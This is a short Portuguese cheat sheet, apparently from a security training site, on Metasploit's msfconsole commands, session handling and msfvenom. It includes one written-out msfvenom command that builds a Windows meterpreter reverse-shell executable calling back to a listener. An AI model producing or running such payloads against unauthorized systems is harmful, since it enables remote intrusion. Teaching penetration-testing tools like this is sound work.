Msfconsole | Msfvenom | Solyd One
- Msfconsole | Msfvenom | Solyd One
Comandos Fundamentais
| Comando | Função |
|---|---|
search <termo> | Busca módulos por nome ou descrição |
use <caminho_do_módulo> | Carrega o módulo para uso |
info | Exibe detalhes do módulo selecionado |
show options | Mostra as opções configuráveis |
set <OPCAO> <valor> | Define um valor para uma opção |
unset <OPCAO> | Remove o valor de uma opção |
exploit ou run | Executa o módulo carregado |
sessions | Lista ou gerencia sessões abertas |
back | Retorna ao menu anterior |
exit | Sai do msfconsole |
Gerenciamento de Sessões
sessions -l: Lista sessões ativassessions -i <ID>: Interage com uma sessãosessions -k <ID>: Encerra uma sessãobackground: Envia a sessão ao plano de fundo
🧠 Diferença entre msfvenom e msfconsole
| Ferramenta | Função Principal |
|---|---|
msfvenom | Gera payloads e arquivos executáveis (shells, meterpreter, scripts) |
msfconsole | Controla, executa e gerencia os módulos do Metasploit (exploit, payload, sessões) |
📦 msfvenom: Gerador de Payloads
🔹 O que ele faz:
- Cria payloads customizados
- Codifica e embala payloads em arquivos
.exe,.elf,.apk,.py,.sh, etc. - Permite testar defesas com shells reversos, binds, meterpreter, etc.
- Não executa nada por conta própria — só gera o artefato
🔧 Exemplos do que ele produz:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f exe -o shell.exe
Resultado: um executável Windows com comportamento de shell reverso.
🖥 msfconsole: Console Interativo
🔹 O que ele faz:
- Interface de linha de comando do Metasploit
- Executa exploits e escuta conexões
- Gerencia sessões abertas por payloads
- Usa módulos como
exploit/multi/handlerpara receber shells - Permite pós-exploração via
meterpreter, coleta de informações, etc.